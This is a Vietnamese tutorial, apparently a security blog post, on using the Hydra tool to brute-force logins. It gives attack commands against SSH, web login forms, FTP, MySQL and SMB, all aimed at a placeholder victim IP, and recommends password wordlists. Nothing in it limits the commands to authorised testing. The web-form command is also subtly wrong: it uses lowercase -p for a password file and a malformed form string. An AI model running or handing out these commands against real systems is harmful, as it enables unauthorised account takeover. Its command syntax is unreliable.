Cách dùng Hydra để Brute Force Password

Hydra là gì?

Hydra là một trong những công cụ thường được Hacker và các nhà nghiên cứu bảo mật sử dụng. Đây công cụ có sẵn trong Kali Linux các phiên bản và được dùng để thực hiện các cuộc tấn công Brute Force Password hay còn gọi là dò mật khẩu.

Trong bài viết này, mình sẽ chỉ cho bạn cách thực hiện một cuộc tấn công brute force với Hydra trên Máy chủ FTP, MYSQL, SMB, SMTP, SSH và Web Login Auth.

Các bài viết liên quan

Hydra: Cách tấn công Brute Force từ xa

26/11/2021

Hướng dẫn dùng Aircrack-ng để Hack Password WiFi WPA/WPA2

18/07/2021

Các cách tấn công của Hacker dùng để chiếm quyền tài khoản của bạn

03/04/2021

Tấn công Brute Force là gì và Cách ngăn chặn

29/12/2020

Mình có bài phân tích về Brute Force và cách ngăn chặn rất chi tiết, nếu bạn muốn tìm hiểu sâu về phương thức này thì nên đọc kỹ bài này.

Wordlist

Khi tấn công Brute Force, bạn cần có sẵn 1 danh sách các ký tự dùng để dò đoán username và password. Bạn nên sử dụng WordList bộ Kaonashi hoặc bộ Worldlist do AnonyViet chia sẻ.

Username WordList:

Hydra cho phép bạn Brute Force cả username, nếu bạn không biết tên đăng nhập, bạn cũng có thể thử WorldList, để sử dụng Hydra tìm Username, bạn phải sửa đổi tham số -l user thành -L user.txt (user.txt là file chứa danh sách tên username dùng để dò mật khẩu).

Password WordList

Là danh sách các Password bạn sẽ dùng để đăng nhập thử vào trang Web hay SSH, FTP…., như đã nói ở trên mình thường dùng bộ Password WordList của AnonyViet sưu tầm.

Cách dùng Hydra để dò mật khẩu các dịch vụ mạng

Brute Force SSH bằng Hydra

Lệnh tấn công:

hydra -l user -P passwords.txt IP_VICTIM ssh

hoặc

hydra -L user.txt -P passwords.txt IP_VICTIM ssh

Brute Force trang Login Website bằng Hydra

Lệnh tấn công:

hydra -l user -p passwords.txt IP_VICTIM http-post-form '/path/login:username_field&password_field=^PASS^:wrong'

Thay thế /path/login:username_field&password_field= bằng đường dẫn và file đăng nhập trong link HTML

wrong: nếu từ này xuất hiện trên trang, thì mật khẩu chưa chính xác

Cách lấy Username Field và Password Field:

• Username Field: mở Firefox nhấn F12 -> Network -> Send Login.
• Password Field: mở Firefox nhấn Firefox F12 -> Network -> Send Login.

Hoặc bạn có thể dùng Burp Suite để bắt Request.

Brute Force FTP

Lệnh tấn công:

hydra -l user -P passwords.txt IP_VICTIM ftp

Brute Force MYSQL

hydra -l user -P passwords.txt IP_VICTIM mysql

Brute Force SMB

hydra -l user -P passwords.txt IP_VICTIM smb

Trên Kali Linux cũng có Hydra phiên bản có giao diện, có thể sẽ dễ sử dụng hơn so với Hydra dòng lệnh để Brute Force, nhưng theo mình bạn nên tập thói quen dùng dòng lệnh để tập làm quen trên Linux và khi cài Hydra lên các hệ điều hành khác bạn có thể dễ dàng sử dụng. Hiện nay cũng có Hydra phiên bản Windows, nhưng mình chưa sử dụng, bạn nào dùng rồi thì comment bên dưới nha.